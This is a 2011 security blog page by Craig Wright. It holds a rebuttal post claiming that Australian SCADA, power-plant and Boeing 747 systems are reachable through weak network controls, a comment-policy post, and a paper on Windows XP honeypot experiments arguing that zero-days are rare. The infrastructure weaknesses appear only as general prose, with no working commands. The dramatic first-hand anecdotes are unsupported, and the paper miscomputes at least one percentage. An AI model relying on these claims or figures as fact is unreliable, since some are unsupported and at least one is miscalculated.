Saturday, 24 September 2011

Security News and Views

This week's podcast is now up.

FACT CHECK - SCADA is online now

A recent "Fact Check" by Scot Terban requires some fact checking.

In his post, he shows that he has no idea how many SCADA systems are online. Scot stated, "How about the fact that said systems are connected to the internet on a regular basis and SCADA aren’t". This is an error of epic magnitude.

The fact is, nearly everything is connected now.

In 2000 I contracted to the Sydney Olympic authority. To make the Olympics run smoothly, NSW government officials decided to connect control systems into a central headquarters. We linked:
  • Traffic systems
  • Rail systems
  • Water systems
  • Power systems
  • Emergency response systems / Police
  • Sewerage systems
That was only the tip of the iceberg. The rail systems had been connected to report on rail movements. They used a Java class file that was set to read the signal devices. The class was not protected, but its read-only status was considered sufficient (despite protests to the contrary).

The control class file was easy to reverse engineer, and it was simple to toggle the controls to turn it into a system that could send signals as well as report them. When I noted that I could reverse engineer the class file, the comment was "not everyone has your skills Craig, we do not think others can do this". Yet it is simple to reverse engineer a Java class file.

Once the Olympics ended, so did any funds to maintain the system. Nothing was done to remove the inter-connectivity; it was considered valuable. But like all systems that are not maintained, it has slowly become less and less secure.

These networks remain connected even now, though many of the people involved in setting them up have left. In fact, many of these networks are not even documented or known to the current people in the various departments.

Two years ago, I was involved in a project to secure the SCADA systems that run and maintain a series of power plants. It was canned: not for lack of funds, but because the SCADA engineers did not trust that firewalling their network would be free of negative impacts. Right now, the only controls are routing based. Unfortunately, they also allow ICMP route updates, access from the file servers and source routing. Some of the systems are running Windows 98. Not XP: 98. There is no need for a zero-day, just some knowledge of the internal routes in the system.

Unfortunately, the routes and network design of this organization (which runs a large percentage of the power stations in NSW) were leaked in a vendor presentation, so they are not difficult to obtain. It does take some effort to become knowledgeable about the systems and how they are run (and to not simply crash them), but the ISO 20000 processes are stored on the same network.

Let us look at some other systems.

A while back (though many of the same systems remain in place today), I was contracted to test the systems on a Boeing 747. The airline had added a new video system that ran over IP, segregated from the control systems using layer 2 VLANs. We managed to break the VLANs and access other systems, and with source routing we could access the engine management systems.

The response: "the engine management system is out of scope."

For those who do not know, 747s are big flying Unix hosts. At the time, the engine management system on this particular airline was Solaris based. The patching was well behind, and they used telnet because SSH broke the menus and the budget did not extend to fixing this. The engineers could actually access the engine management system of a 747 en route. If issues are noted, they can re-tune the engine in the air.
The issue here is that all that separated the engine control systems from the open network was a set of NAT-based filters. There were (and as far as I know still are) no extrusion (egress) controls: incoming traffic is filtered, but all outgoing traffic is allowed. For those who engage in pen testing and know what a shoveled shell is... I need not say more.


Nearly all SCADA systems are online. The addition of a simple NAT device is NOT a control. Most of these systems are horribly patched, and some run DOS, Win 95, Win 98 and even old Unix variants. Some are on outdated versions of VMS. One I know of is on a Cray and another is on a PDP-11. The last of these has an issue: the operators do not believe it will ever restart if it goes down, so that PDP-11 is not touched. We scanned a system on that network a couple of years back and it crashed; the answer was that we could never even ping the PDP-11, as it was thought that could crash it too.

Yes Scot, Windows XP and unpatched networks are a concern, but they are less of a concern than those systems that are connected to the world and which control physical systems.

Right now, the Commonwealth government here in Australia has a mandated project to connect to IPv6 by next year. I have been travelling and presenting to many departments in the last few months for this reason. Even with all the good standards from DSD, few of the people tasked with implementing these systems knew that IPsec supports a NULL cipher. The DSD standards do say that you cannot use NULL as a cipher, but the awareness is only starting to grow (hence a very busy schedule actually talking to people in a number of government departments and letting them know these things).
Next year, IPv6 will start to become the norm in the Australian Commonwealth Government, and in time it will be all there is. This starts with an IPv4-IPv6 gateway and transition project, but that is only the start, and soon others will have to switch as well. Soon (within 5 years), SCADA systems will be connected on IPv6 networks here in Australia.

IPv6 is distributed. There are no crunchy firewalls on the outside, and even NAT offers little. Scot (and others who run some of these systems), I suggest that you have a look at how things are really configured.

On another note, I look forward to seeing those of you in Melbourne next week at BOM for our IPv6 workshop. If you read the DSD guidelines first, it will add further value to the session.

About the Author:
Craig Wright is the VP of GICSR in Australia. He holds the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous postgraduate degrees, including an LLM specializing in international commercial law and e-commerce law and a Master's degree in mathematical statistics from Newcastle, and is working on his 4th IT-focused Master's degree (Masters in System Development) from Charles Sturt University, where he lectures subjects in a Master's degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk, at CSU.

On Censoring Comments.

In the comment queue I see a number of comments that do not make it to display. These are either SPAM or anonymous ones with problems.

The first lesson for those ignorant people who think they have an inbuilt right to post here is that this is not a public forum; it is my blog. Not theirs, mine. On it, I distribute my research and other things of interest, mostly in security and economics.

The next lesson, for those who do not wish to be blocked, is that foul language will get you nowhere. I do not post comments that are insulting and which offer nothing but gutter language.

I will and do post comments that disparage what I am doing, and I allow dissenting opinions. I am happy for you to point out errors that I have made, and I will even add an update with my own comment stating what the error is, alongside the comment that pointed it out.

I have allowed, and do at times allow, comments that are borderline when they are not simply from anonymous cowards.

Friday, 23 September 2011

Who uses zero days?

My colleague (Tanveer Zia) and I presented a paper at CACS 2011 this week titled:
Of Black Swans, Platypii and Bunyips: The outlier and normal incident in risk management
It can also be downloaded from the SANS Reading Room.

In the two years this experiment ran (over 640 hosts and 620 days), we experienced no zero-day attacks on any system. We recorded the attacks in pcaps, so there are many years' worth of analysis to be completed by our future doctoral students, but no zero-days were noted, even when we re-ran the data a year or more after the attacks.

Basically, what we are showing is that zero-day attacks are overhyped. What matters is not the vendor spin on 0-days, but the basics: patching, good design and human awareness controls. We did not test browser interaction with users in this experiment; that is a future paper. There is only so much one can do in a single experiment.

On to the paper.

Abstract

To act rationally requires that we forecast the future with inadequate information, using the past as a guide for all its flaws. We make decisions in the absence of knowledge. We state that black swans and bunyips do not exist. From time to time, we find that we have decided in error and black swans are found. However, for every black swan, there is a unicorn, a dragon and a bunyip that does not exist and which we remain confident will never be found.

Zero-day security vulnerabilities remain the fear of many security professionals. We present empirical evidence as to the rarity of these events as a source of system compromise. Instead, we demonstrate how common misconfigurations and old attacks are far more of a concern to the security professional. We show that predicting zero-day attacks is possible and that defending systems against common vulnerabilities significantly lowers the risk from the unexpected and “unpredictable”.

The inherent psychological biases that have developed in the information security profession have centered on the outlier effect. This has led to a dangerously skewed perspective of reality and an increase in the economic costs of security. This paper demonstrates that producing resilient systems for known events also minimizes the risk from black swans without the wasted effort of chasing myths.

Keywords: Information Security, Economics, Risk, Black Swans.

I. Introduction

The fallacy of the black swan in risk has come full circle in information systems. Just as the deductive fallacy, “a dicto secundum quid ad dictum simpliciter” allowed false assertions that black swans could not exist when they do, we see assertions that risk cannot be modeled without knowing all of the ‘black swans’ that can exist. The falsity of the black swan argument derives from a deductive statement that “every swan I have seen is white, so it must be true that all swans are white”. The problem is that which one has seen is a subset of the entire set. One cannot have seen all swans.

Likewise, the argument that not enough weight applies to zero-day vulnerabilities and that these are a major cause of system intrusions relies on the same reasoning. The assertion that more compromises occur because of zero-day vulnerabilities comes from a predisposition to remember the occurrence of a zero-day attack more often than one remembers a more frequently occurring incident. Whereas near-eidetic recall comes from events that are unusual, common events are more often forgotten [23]. This leads to treating common events as if they matter less than they do.

Taleb [20] formulated the Black Swan Theory with the assertion that unpredictable events are much more common than people think and are the norm, not the exception. In this, he has fallen into the very logical fallacy and trap against which he rails. This fallacy of arguing from a particular case to a general rule, without recognizing qualifying factors, led people, before the exploration of Australia, to state that black swans could not exist instead of stating that it was unlikely that they existed. When Australia was finally explored, platypii and bunyips were reported along with black swans. At first, many refused to believe that a creature such as the platypus could be possible. The scientific discovery and examination of these creatures was unlikely, but far from impossible, as their existence demonstrated. The discovery of such an unexpected creature led others to believe that bunyips could also exist. They asserted that the discovery of other unlikely creatures made the discovery of the bunyip more likely.

Though it is still possible that this is, or at least was, the case, the existence of bunyips remains incredibly unlikely. In fact, it is so unlikely that we can state with a reasonable level of certainty that bunyips do not exist. Many people have spent large amounts of money searching for mythical creatures. At times in the past, some of these creatures have been found to be real. The fact remains that more monsters exist in our minds than could ever exist in the world.

For many years, information security and risk management has been an art rather than a science. This has been detrimental to the economy as a whole as well as to the operations of many organizations. The result has been a reliance on experts whose methodologies and results can vary widely and which have led to the growth of fear, uncertainty and doubt within the community. Although many true experts do exist, some of whom exhibit an insightful vision and ability, for each true expert, many inexperienced technicians and auditors abound.

This inability to allocate resources effectively in securing systems has created a misalignment of controls and a waste of scarce resources with alternative uses. This paper aims to demonstrate that the common risk is the one against which to protect. Zero-day vulnerabilities and strange events are memorable, but this does not make them the target of an effective risk mitigation program, nor does it mean that they are the most likely events to occur. Unusual and unexpected events upset a number of models and methods that are common in many other areas of systems engineering, but which are only just starting to be used in the determination of information systems risk. These processes can help the inexperienced security professional as well as adding to the arsenal of tools available to the consummate expert. In place of searching for bunyips, we should implement systems that cover the majority of failures and prepare to act when unusual events emerge.

The standard systems reliability engineering processes are applicable to information systems risk. These formulae and methods have been widely used in systems engineering, medicine and numerous other scientific fields for many years. The introduction of these methods into common use within risk and systems audit will allow the creation of more scientific processes that are repeatable and do not rely on the same individual for the delivery of the same results. Some failures will occur: a 99% confidence interval, though considered a good measure, brings a level of uncertainty by definition. The issue is that it is unwise to discard the normal occurrences in favor of a black swan that may turn out to be something else again. By assuming that all black swans lead to catastrophic and unpredictable failure, we are again destroying the exception.

II. An investigation into the causes of system compromise

In order to test the causes of system compromise, we configured 640 Windows XP Professional systems on virtual hosts. Each host was placed on an IP address external to a network firewall. Three separate tests formed the foundation of the experiment. For these, we set the baseline security of each system as a CIS (Center for Internet Security) score. The CIS Windows XP Professional Benchmark v.2.0.1 [24] formed the security test metric.

These are:
  1. A base install of a Windows XP SP 2 system.
  2. An increasing CIS score was configured on the hosts.
  3. A Snort IDS was used to separate worms and other automated malware from interactive attacks.
Network traffic monitors were used to determine whether a system had been compromised. The hosts had no third party applications and initially had auto-updating disabled. A host, when compromised, was reset and reconfigured for the next set of survival tests. The reset utilized the VMware 'snapshot' feature to take the system back to a known good state [see 16, 17, 18].

In this paper, we have defined a zero-day attack as one that is generally unknown. Some authors [26] define a zero-day attack as one where a "flaw in software code is discovered and code exploiting the flaw appears before a fix or patch is available. Once a working exploit of the vulnerability has been released into the wild, users of the affected software will continue to be compromised until a software patch is available or some form of mitigation is taken by the user". For the purposes of this paper, we have defined a zero-day attack as one that uses computer vulnerabilities for which no solution currently exists, including patching from the vendor, third party patches or workarounds. In this way, a vulnerability with a CVE number and third party protection (such as IPS filters or anti-malware updates that stop the attack) is not a zero-day attack for the purposes of this paper.
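The paper's working definition can be expressed as a simple predicate. The sketch below is illustrative only; the record and field names (Vulnerability, has_vendor_patch, has_third_party_mitigation) are hypothetical and not taken from the paper.

```python
from dataclasses import dataclass

@dataclass
class Vulnerability:
    """Hypothetical record; field names are illustrative, not from the paper."""
    has_vendor_patch: bool
    has_third_party_mitigation: bool  # IPS filter, AV signature or work-around

def is_zero_day(v: Vulnerability) -> bool:
    # Under the paper's definition, a vulnerability is a zero-day only when
    # NO solution of any kind exists: no vendor patch and no third-party fix.
    return not (v.has_vendor_patch or v.has_third_party_mitigation)

print(is_zero_day(Vulnerability(False, True)))   # mitigated via IPS -> False
print(is_zero_day(Vulnerability(False, False)))  # truly unmitigated -> True
```

Under this predicate, a CVE-numbered flaw with an IPS signature but no vendor patch is not counted as a zero-day, which is exactly the classification applied to the compromises below.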

Figure 1. Survival times with the Windows Firewall Disabled.

This aligns with the definition of a “zero-day exploit” occurring “when the exploit for the vulnerability is created before, or on the same day as the vulnerability is learned about by the vendor” [23]. This is a superior definition of the term and should be used in place of the former. Many vulnerabilities remain unpatched for many months with user and vendor knowledge. These are commonly stopped using alternative approaches and work-arounds in place of vendor patches.

The reason for this lies in the ability to predict an attack. This paper seeks to measure the impact of controls that can be predicted and to compare these to attacks that have no known solution. A published attack with no official vendor patch may be mitigated and predicted; this type of attack is not a 'black swan'. The unpredictable requires an attack that is unknown or unpublished. A select few experts could know of this type of vulnerability, but this does not give the public knowledge of the issue. As such, this limited knowledge would not lead to a generally deployed work-around.

C. Modeling the impact of a single control

The first test process separated the hosts into two classes: those with the Windows XP Firewall enabled, and those with it disabled. No third party products (including anti-malware software) were used on either class of system. With the release of Windows Vista and Windows 7, an analysis of the impact of the firewall included in Windows XP may seem a little dated. However, the same use and deployment of this control applies to both Windows Vista and Windows 7, and many organizations still use Windows XP.

The histogram in Fig. 1 displays the distribution of survival times for the un-firewalled Windows XP hosts. The Conficker worm, which compromised the un-firewalled hosts in quick succession, skewed this result. The quickest compromise came 5.4 seconds after the network cable was connected (this was in May 2009). This was an exception and hence an outlier. The mean time to compromise of the hosts was just over 18 hours, with only 25% of the sample compromised in less than 3 hours.

Figure 2. Survival time for Windows XP classified by interactive attacks and Automated malware (Worms).

When the results of the firewalled and un-firewalled hosts are compared, we can confidently assert that the Windows host firewall is a control that has a statistically significant effect when used. We say 'when used', as this is a control that is commonly overlooked or disabled. The results from enabling the Windows firewall are displayed in Fig. 2, and a side-by-side box plot is displayed in Fig. 3. With the firewall enabled, the mean survival time of the Windows XP SP2 systems increased to 336 days. No system with this control enabled was compromised in less than 108 days. With the maximum survival time for an unpatched and un-firewalled Windows XP system predominantly measured at less than 5 days, and the minimum compromise time at 108 days with the firewall enabled and no additional patching, it is hard not to conclude that the Windows Firewall makes a statistically significant difference to the security of the system.

We used the Snort IDS for this exercise. This provided the details of the attacks, allowing an analysis of worm (automated) compromises against manual ones (attackers, script kiddies, etc.). The IDS sat between the Internet-connected router and the virtualized Windows XP hosts. Any outgoing traffic was investigated.
Of the 640 hosts used for this experiment, no system was compromised with a zero-day attack. Many new and novel attacks against known vulnerabilities did occur, but not a single compromise was due to an unreported vulnerability. Further, no attack without a patch was used to compromise any of the systems. This means that if the systems had been patched, none of the attacks would have succeeded.

Figure 3. Comparing the use of the Firewall to an unprotected XP system.

In a simple test of a single control, enabling this control had a marked effect on the survivability of the system. We see that leaving the host running with the firewall enabled provided a good level of protection (without a user on the system). This does not reflect a true Windows XP system, as no third party applications or user actions were introduced to confound the results. All connections to these hosts are from external sources to the host (as in a server model), and no users are browsing malware-infected sites. In general, a Windows XP system will have a user and will act as a client. This introduces aspects of browsing and retrieving external files (e.g. email). These aspects of the host's security will change the survival rates of a system, but we can see that there is a significant advantage from even a simple control.

TABLE I. Survival Times

Statistical analysis of survival times:
  Windows Firewall Enabled:  mean survival 8,064.640 hours
  Windows Firewall Disabled: mean survival 18.157 hours

Welch two-sample t-test: t = -170.75, df = 2272, p-value < 2.2e-16

The boxplot (Fig. 3) and the results of a Welch two-sample t-test (Tab. 1) demonstrate that the two conditions are statistically distinct at a significant level (alpha = 1%). With a p-value < 2.2e-16, we can reject the null hypothesis of no significant improvement and state that there is overwhelming evidence in favor of deploying the Windows XP firewall (or an equivalent).
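The Welch test reported in Tab. 1 can be reproduced in a few lines. The sketch below implements the Welch statistic and the Welch-Satterthwaite degrees of freedom directly; the toy survival times are invented for illustration and are not the experiment's raw data.

```python
import math
from statistics import mean, variance

def welch_t(a, b):
    """Welch's two-sample t statistic and Welch-Satterthwaite df.
    Unlike Student's t-test, equal variances are not assumed."""
    na, nb = len(a), len(b)
    va, vb = variance(a), variance(b)      # sample variances
    se2 = va / na + vb / nb                # squared standard error of the difference
    t = (mean(a) - mean(b)) / math.sqrt(se2)
    df = se2 ** 2 / ((va / na) ** 2 / (na - 1) + (vb / nb) ** 2 / (nb - 1))
    return t, df

# Toy survival times in hours (invented for illustration only).
disabled = [12.0, 18.5, 25.1, 9.7, 30.2, 15.0]              # firewall off
enabled = [7900.0, 8200.5, 8100.2, 7850.9, 8302.1, 8030.3]  # firewall on
t, df = welch_t(disabled, enabled)
print(f"t = {t:.2f}, df = {df:.1f}")
```

A large negative t with a correspondingly tiny p-value is what drives the rejection of the null hypothesis above; Welch's variant is the right choice here because the two groups' variances differ by orders of magnitude.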

The regrettable finding is that, in a sample of 136 home systems drawn from corporate computers and a sample of 231 systems inside various corporate networks, few systems ran a firewall. Of the home hosts tested, 31.28% (or 23 systems) had the Windows XP Firewall or a commercial equivalent installed and running. Of the internal systems tested, 6.1% (14 hosts) had an internally (inside the corporate firewall) enabled firewall. The ability to enable IPSec and Group Policy within a corporate environment is a control that is generally overlooked or bypassed. The results of enabling (or rather, not disabling) the Windows Firewall produce a pronounced benefit to the survivability of systems.

Figure 4. Survival time for Windows XP classified by interactive attacks and Automated malware (Worms).

In this first experiment, we see marked benefits from a simple control without the worry of any black swan effect.

D. Modeling system survival by attack class

In the previous section, the results of a series of hazard modeling experiments on Windows XP were limited to a base install and the use or disabling of the firewall. We next altered the experiment to investigate the attacks by class, in particular comparing the systems that were compromised by an automated process (worms etc.) against those that involved at least some level of interaction.
Each of the systems was reset and configured with a varying level of controls. The CIS metrics were calculated using the automated tool. Systems were distributed evenly between the metrics in 5% intervals (that is, 32 systems were allocated to each 5% bracket). The systems were made either more or less secure by enabling and disabling controls until a complete spread of scores was created.

Fig. 4 and Fig. 5 display a significant difference in the patterns of compromise due to automated and interactive attacks. We can see from the plots that worms act faster against vulnerable systems and that interactive users (attackers) are more capable of compromising more secure systems. This is most easily seen on an overlay plot (Fig. 5), which displays the survival time against automated processes (green) overlaid with that of manual processes (red). The Loess fit for each is also incorporated into the plot.

Figure 5. Automated vs Interactive attacks and survival times.

What we see from these results is that the more secure a system is (in this case, patched against known vulnerabilities), the more likely it is that a compromise was manually initiated. Likewise, less secure (unpatched and vulnerable) systems are exposed to more automated attacks (e.g. worms).

E. System Modeling by CIS Metric

A selection of 48 Windows XP SP2 computers, comprising 16 physical hosts and 32 virtual machines, was used for this test. This was conducted in order to examine the differences (if any) that may result from using a virtualized host in place of a physical host. The tests were run over a 600-plus day period starting in November 2007. When a physical host was compromised, it was taken offline for 10 days. In this period, the host was rebuilt in a slightly different configuration. The 32 virtual hosts were built with differing levels of patching. These hosts were reverted to a VM snapshot following a compromise, at which point they would be re-patched and reassessed.

The same Snort IDS system used in the previous experiment was deployed to measure the attacks against the physical hosts. The 32 virtual hosts were configured on a single high-end Red Hat server running Snort. No filtering was conducted, but all attacks were logged. The survival time for a host is the time from when the host was placed live on the network until a local compromise occurred. The 16 physical hosts were connected to a Cisco switch sitting behind a Red Hat Linux host running Snort and acting as a forwarding router.

Each host in both the physical and virtual configurations was placed on its own '/29' network. Each was assigned an internal IP in the 10.x.y.z address range, with the Red Hat host taking the lower IP address and the host being tested the upper. Static NAT was used to pass a real IP address to the host in the range 203.X.Y.194 to 203.X.Y.242. The full addresses and netmask are not reported at this time in order to minimize any impact on ongoing experiments.
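The per-host addressing scheme can be sketched with Python's ipaddress module. The 10.1.2.0/29 prefix below is illustrative only; the experiment's actual internal and external addresses are withheld above.

```python
import ipaddress

# One illustrative /29 per test host: the Red Hat router takes the lower
# usable address and the Windows XP host under test the upper one.
subnet = ipaddress.ip_network("10.1.2.0/29")
usable = list(subnet.hosts())          # a /29 yields 6 usable addresses
router, xp_host = usable[0], usable[-1]
print(subnet.netmask, router, xp_host)  # 255.255.255.248 10.1.2.1 10.1.2.6
```

Placing each test host on its own tiny subnet behind the forwarding router is what makes the per-host isolation rule described below enforceable at the router.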

Figure 6. Survival for Physical vs Virtual hosts.
The iptables configuration on the two Red Hat systems allowed any IPv4 traffic from the Internet and blocked any IPv6 traffic. The Red Hat hosts did not have publicly routable IP addresses. Internet hosts were allowed to connect to any system on any port. The only restriction was designed to block traffic between the Windows XP hosts and any other host on the same network. This allowed a host to be compromised from the Internet, but a compromised host could not see another host on the same network. The Windows XP firewall was disabled for all CIS scores less than 90 and for some hosts with scores greater than 90 (although it is difficult to create a host with a score greater than 90 and the firewall disabled).

This was done to create a level of independence, with attackers having to compromise systems in the same way and not being able to "hop" across systems (as occurs in real compromises). The goal of this experiment was to record initial compromises and not the subsequent process (that being the goal of a separate and ongoing experiment). The times and measures have all been recorded and analyzed. As before, no web browsing or other internal activity was conducted from the systems under test.

The scatterplot (Fig. 6) plots the measured CIS score against the time that it took to compromise the host. We see that there was a significant benefit in achieving a score of 80+. Any host scoring less than 40 was compromised relatively quickly. A host scoring 46 was compromised within 24 hours. All scores of 60+ remained uncompromised for at least a week. One host with a score of 59 on the CIS scale remained uncompromised for 98 days.

Similar results were recorded for the hosts in the VM group (blue) and the physical group (red) in the scatter plot (Fig. 6). A Loess best fit has been applied to this scatter plot, marking the expected survival time by CIS score. As the score increases, the variance also increases, but this can be seen as a function of increasing survival times. No statistically significant difference in survival times was noted as a result of a host being virtualized or physical.
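The Loess fits in Fig. 5 and Fig. 6 are locally weighted regressions. As a rough sketch of the idea only (a degree-zero, tricube-weighted local average rather than the local linear fit real Loess uses), with invented data:

```python
import math

def loess_point(x0, xs, ys, span=0.5):
    """Tricube-weighted local average at x0 (a simplified, degree-0 Loess)."""
    k = max(2, int(span * len(xs)))                   # neighbourhood size
    h = sorted(abs(x - x0) for x in xs)[k - 1] or 1e-9  # local bandwidth
    w = [(1 - min(abs(x - x0) / h, 1.0) ** 3) ** 3 for x in xs]
    return sum(wi * y for wi, y in zip(w, ys)) / sum(w)

# Invented (CIS score, survival days) points for illustration only.
xs = [10, 20, 30, 40, 50, 60, 70, 80, 90]
ys = [0.5, 1.0, 2.0, 4.0, 9.0, 20.0, 45.0, 120.0, 300.0]
smooth = [loess_point(x, xs, ys) for x in xs]
```

Each fitted point is an average of its nearest neighbours, with weights decaying smoothly to zero at the edge of the neighbourhood; this is why a Loess curve tracks local trends without imposing a single global model on the scatter.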

From these results, we can assert that automated systems are more likely to compromise poorly configured systems than well-configured ones. This result is no more than common knowledge; however, we also see that an interactive attacker is more likely to succeed in compromising a well-configured system when compared to an automated process. We also see that even the best-configured system fails in time.

Figure 7. Mapping survival by critical vulnerabilities.
Again, no system failed from an unknown attack. Of note is that several systems were compromised using new but known attacks. In the majority of attacks against a system with a CIS score greater than 60 and with the Windows firewall enabled, the system was compromised between patch cycles; that is, the attack occurred against a new vulnerability before the scheduled patch release was due. We further note that, in all instances, these attacks involved systems that were not interactively managed. Work-arounds existed for all of the incidents that led to compromise of the more secure systems.
Further, more sophisticated anti-malware, firewall or other system security software would have stopped these attacks. This is why we have not classified these attacks as zero-days. The vendor did not have a public patch, but a work-around or third party control existed in all instances.

The issue comes to economic allocation of scarce resources. Numerous solutions could have stopped all of the attacks against the secured hosts. Some of these solutions would have cost less than implementing the controls that gave the Windows system a greater CIS score.

F. Mapping survival time against vulnerabilities

The next part of the experiment involved configuring 16 Windows XP SP2 hosts with a set, measured number of critical vulnerabilities. We left these hosts unpatched for a selected set of vulnerabilities (ranging from 1 to 10 unpatched vulnerabilities per host), while applying all other patches for newer vulnerabilities as they became available. The particular vulnerabilities were randomly selected on each host from the SANS Top 20 vulnerability list [25].

Figure 8. Attacker time by CIS metric.
All of the hosts used virtualization with 'snapshots' enabled. A host that was compromised was reassigned a new IP address and reactivated 14 days later. Reactivation involved restoring the host to the snapshot and patching it. The host was left with the same number of critical vulnerabilities, but a different set of vulnerabilities was selected randomly from the SANS list.

The results of the experiment provided a good model for predicting system survival. A system with a greater number of vulnerabilities is compromised more quickly; the relationship is a negative exponential. Each additional vulnerability exposed on a host significantly increases the likelihood of compromise. We can hence assert that the greater the number of vulnerabilities a system has, the faster it is compromised. No system with six (6) or more unpatched, network-accessible vulnerabilities remained uncompromised for more than 15 days, and a compromise occurred in as little as four (4) days on systems with two (2) vulnerabilities. A system with no critical vulnerabilities can be expected to survive for several months even without administrative interaction. Again, none of the attacks against these systems could be termed black swans. Each was known and predictable, and in each case a known work-around existed.
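The reported relationship can be sketched as a simple decay model. The constants below are illustrative values chosen only to be consistent with the bounds reported above (compromise of all six-plus-vulnerability hosts within 15 days, several months of survival with none); they are not the study's fitted parameters.

```python
import math

# Hypothetical fit: survival time decays exponentially with the number of
# exposed vulnerabilities. A and K are illustrative, not the study's values.
A = 90.0   # assumed survival (days) of a host with no critical vulnerabilities
K = 0.45   # assumed decay constant per additional vulnerability

def expected_survival_days(vulns: int) -> float:
    """Expected days until compromise for a host exposing `vulns`
    unpatched, network-accessible critical vulnerabilities."""
    return A * math.exp(-K * vulns)

for v in range(0, 11):
    print(f"{v:2d} vulnerabilities -> ~{expected_survival_days(v):6.1f} days")
```

With these illustrative constants, a clean host survives about three months while a host with six exposed vulnerabilities falls inside the 15-day bound reported above.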

G. Attack time by CIS Score

The time between the initial instigation of an attack and the point at which an attacker either moved on or compromised a host was analyzed for related systems. As we have no means of correlating the systems an attacker may use, this value is in many cases lower than would be recorded if all the IP addresses used by a single attacker could be linked. As such, this result is only indicative and does not take into account attacks from single attackers who use multiple addresses.

Figure 9. Attacker time by CIS metric and attack class.
In Fig. 8, we see that there is an inflection point in the amount of time spent attacking a system. More secure systems (a high CIS metric) appear to discourage attackers, whereas insecure systems (a low CIS metric) are quickly compromised. Some attackers are determined and will continue to attack a host for extended periods of time; even when an attacker gets little or no positive feedback, many continue to test a system.

This result holds even more strongly when the attack class is separated into automated and interactive attacks (Fig. 9). Automated attacks spend little time on a system before compromise and, when a system is not compromised, display little intelligence in the attack patterns deployed against a host. An interactive attack displays a marked drop in the time per host as the security metric increases: as the host exhibits fewer vulnerabilities, the attacker spends less time exploring it. It must be noted that the attackers in this experiment arrived at random. The distribution of attackers is unlikely to contain dedicated attackers targeting a particular site (as many cyber criminals and ‘hacktivists’ would do [13]). The hosts appeared as normal corporate and home systems, and no information was provided to the attacker that would enable them to associate the hosts with any particular organization.

II. Discussion

User interactions affect survival times in the real world and will of course change the models produced by this experiment. The modeling of complete interactive systems was outside the scope of the experiment, but user actions can be modeled [22] with more advanced techniques (such as clustering algorithms). The results of the experiments presented demonstrate that the focus on zero-day or black swan events is misplaced. These can cause damage, but they are no more likely to damage a system than an attack using a well-known vulnerability that has not been patched. As Anderson [1] notes, maintaining security is hard. The economic costs [2] of maintaining a system with all the required patches for all applications are frequently greater than the cost of purchasing and installing the software.

The problems with focusing on zero-day attacks are two-fold. First, the number of attacks that result from true [6] zero-day events is minimal. These incidents also cause the same damage as an incident resulting from a known vulnerability: a system compromise is a system compromise. The impact of its being the result of a previously unknown attack is minimal in comparison to the result of the compromise itself.

Next, and more importantly, the total number of negatives is too large. There are simply too many black swans. For every attack that can succeed, there is a near infinite number of possible attack vectors, most of which never occur and never will. One such example is the oft-recurring argument as to the possibility of an attack against a fax server running on an analogue line [1]. Much effort that could have been better applied to securing known issues has been applied to such bunyips. Even where a zero-day event occurs as a platypus (that is, a completely unexpected event that few would have believed possible), the impact is rarely greater [3,4,6,7] than a compromise from an issue that was exposed but known.
As Carroll (1871) [8] noted when parodying Victorian inventions, we change little and often give little thought to the economic allocation of funds to mitigate risk.

"I was wondering what the mouse-trap was for," said Alice. "It isn't very likely there would be any mice on the horse's back."
"Not very likely, perhaps," said the Knight; "but, if they do come, I don't choose to have them running all about."
A focus on the unknown at the expense of the basics is foolhardy at best. We can expend effort on addressing all possible and even unknown issues like Carroll’s knight, but this will divert expenditure from those events with the greatest impact. By focusing on the unknown, we fail to address the issues that have the greatest impact [28]. The result of such an action is waste and loss [12]. By addressing the known issues, we also mitigate many of the unknown ones without trying.

Relative computer security can be measured using six factors [4]:
  1. What is the importance of the information or resource being protected?
  2. What is the potential impact, if the security is breached?
  3. Who is the attacker likely to be?
  4. What are the skills and resources available to an attacker?
  5. What constraints are imposed by legitimate usage?
  6. What resources are available to implement security?
In no event can we account for the unknown, but nor should we overly concern ourselves with it. Basic system hygiene and controls do more to counter black swan events in computer systems than does an effort focused on the unknown. Of more concern is the limitation we place on responsibility. Focusing on software patches moves the responsibility from the user to the vendor, which makes it less likely [18] that the user will actively implement controls that can mitigate the issues that may occur through software bugs.

By limiting the scope of the user's responsibility, the user's incentive to protect their systems is also limited. That is, the user does not have the requisite incentive to take the optimal level of precautions. Most breaches are not related to zero-day attacks [9]. Where patches have been created for known vulnerabilities that could lead to a breach, users will act in a manner (rational behavior) that they expect to minimize their costs. Whether risk seeking or risk averse, the user aims to minimize the costs that they will experience. This leads to a wide range of behavior, with risk-averse users taking additional precautions and risk-neutral users accepting their risk by minimizing their upfront costs (which may lead to an increase in loss later). In any event, the software vendor, as the cause of a breach, is not liable for any consequential damages. This places the appropriate incentives on the user to mitigate the risk. As is noted below, the vendor has the incentive to minimize the risk to their reputation [27].

The behavioral effect of loss aversion (the propensity of information security professionals to minimize the impact of loss even against risks that have expectation values of greater gain) should be explored in association with concepts of social capital and cognitive biases such as the endowment effect (for instance, where an individual is “willing to reveal” at a high price but “willing to protect” only at a low price). These issues will be appraised against the psychological propensities for anchoring and adjustment and the status quo bias (the predisposition to resist changing an established behavior unless the incentive is overwhelmingly compelling). The open question is why we are more willing to blame vendors than to fix our systems, and how we can align this to effect a more positive outcome.

The valence effect (an individual’s overestimation of the likelihood that favorable events will impact oneself) could be modeled in terms of its impact on, and causal relationship with, information security, along with the feedback effect from rational ignorance and the “cold-hot empathy” gap. The failure to expend resources effectively in securing systems has created a misalignment of controls and a waste of scarce resources with alternative uses. The creation of models and methods that are common in many other areas of systems engineering, but which are only just starting to be used in the determination of information systems risk, is feasible.

III. Conclusion

The optimal distribution of economic resources allocated against risks across information systems can only lead to a combination of more secure systems at a lower overall cost. The reality is that, as with all safety issues, information security derives from a set of competing trade-offs between economic constraints. The goal of any economically based quantitative process should be to minimize cost and hence minimize risk through the appropriate allocation of capital expenditure. To do this, the correct assignment of economic and legal liability to the parties best able to manage the risk (that is, the lowest-cost insurer) is essential, and it is this allocation that requires assessment. It will allow insurance firms to develop expert systems that can calculate risk-management figures associated with information risk, and hence allow for the correct attribution of information security insurance products. These, when provided to businesses generally, will provide for the black swan incident.

